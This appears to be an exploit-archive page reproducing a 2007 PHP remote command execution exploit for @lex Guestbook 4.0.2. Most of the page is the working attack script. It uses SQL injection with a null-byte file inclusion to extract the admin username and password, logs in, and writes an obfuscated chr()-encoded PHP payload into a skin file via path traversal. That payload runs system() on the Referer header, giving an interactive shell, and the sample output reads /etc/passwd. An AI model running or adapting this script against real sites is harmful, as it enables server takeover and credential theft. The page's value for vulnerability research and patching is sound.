@lex Guestbook <= 4.0.2 Remote Command Execution Exploit

2007.01.14
Credit: DarkFig
Risk: High
Local: No
Remote: Yes
CVE: CVE-2007-0202 | CVE-2007-0205
CWE: N/A

#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); /*/ | | header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit | header> ======================================================== | status> Retrieving the administrator password | sploit> AdminUsername::root | sploit> AdminPassword::toor | status> Trying to get logged in | sploit> Done | status> Trying to add a skin | sploit> Done | status> Writing the malicious skin | $shell> whoami | darkfig | | $shell> cat /etc/passwd ... | /*/ if($argc < 2) { print "n---------------------------------------------------------"; print "nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version print "nPoc.ID........: 20070107"; print "nType..........: PHP Code Execution"; print "nRisk.level....: High"; print "nSrc.download..: www.alexphpteam.com"; print "nPoc.link......: acid-root.new.fr/poc/20070107.txt"; print "nCredits.......: DarkFig"; print "n---------------------------------------------------------"; print "nUsage.........: php xpl.php <url>"; print "nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>"; print "nExample.......: php xpl.php http://victim.com/@lexgb/"; print "n---------------------------------------------------------n"; exit(1); } $url=$argv[1]; $prs=$argv[2]; $pra=$argv[3]; $xpl = new phpsploit(); $xpl->agent("Sploitzilla"); if(!empty($prs)) $xpl->proxy($prs); if(!empty($pra)) $xpl->proxyauth($pra); /*/ | | index.php | ========= | ... include($chem_absolu."include/livre_include.".$alex_livre_ext); | | | livre_include.php -> Local File Inclusion | ================= | ... set_magic_quotes_runtime(0); // thx =) | ... if (isset($_GET['lang']) && $_GET['lang'] && file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext) ) | $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =] | include($chem_absolu."languages/".$f_language.".".$alex_livre_ext); | | | index.php -> SQL Injection | ========= | ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'"); | // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre` | /*/ $sql = "index.php?lang=english.php%00'%20union%20select%20". "concat('XPLLogin:',(select%20login%20from%20alex_livr". "e_users%20LIMIT%201),'XPLPass:',(select%20pass%20from". "%20alex_livre_users%20LIMIT%201))/*"; print "nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit"; print "nheader> ========================================================"; print "nstatus> Retrieving the administrator password"; $xpl->get($url.$sql); if(preg_match('#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#',$xpl->getcontent(),$co unt)) print "nsploit> AdminUsername::".$count[1]."nsploit> AdminPassword::".$count[2]; else die("nsploit> Exploit failed"); print "nstatus> Trying to get logged in"; $xpl->post($url."admin/index.php","f_login=".$count[1]."&f_pass=".$count [2]."&f_identif=Identification"); if(preg_match("#f_cadres.php?f_sid=([a-z0-9]{32})#",$xpl->getheader(), $sid)) print "nsploit> Done"; else die("nsploit> Exploit failed"); print "nstatus> Trying to add a skin"; // skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755) $xpl->post($url."admin/skins.php?f_sid=".$sid[1],"aj_skin=../../language s/d4h4x0rskin&ajouter=Ajouter"); if(!preg_match('#alert("ERREURn#',$xpl->getcontent())) print "nsploit> Done"; else die("nsploit> Exploit failed"); $scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).". "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).". "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).". "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45).". "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27).". "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52).". "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52).". "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)"; $data = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit". "%3D../../languages/d4h4x0rskin&alex_livre=<?phprn@e". "val($scode);exit(0);rn?>&add_message=&nb_message_pa". "ge=&list_pages=&corps_messages=&space=&assembly=&enre". "gistrer=Enregistrer"; print "nstatus> Writing the malicious skinn$shell> "; // skins.php ... write($chem_absolu."templates/skins/".$_GET['skin_edit']."/".$tab_templa te_guestbook[$i]) $xpl->post($url."admin/skins.php?skin_edit=../../languages/d4h4x0rskin&f _sid=".$sid[1],$data); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { $xpl->addheader("Referer",$cmd); $xpl->get($url."index.php?lang=d4h4x0rskin/alex_livre.css%00"); print $xpl->getcontent(); print "n$shell> "; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top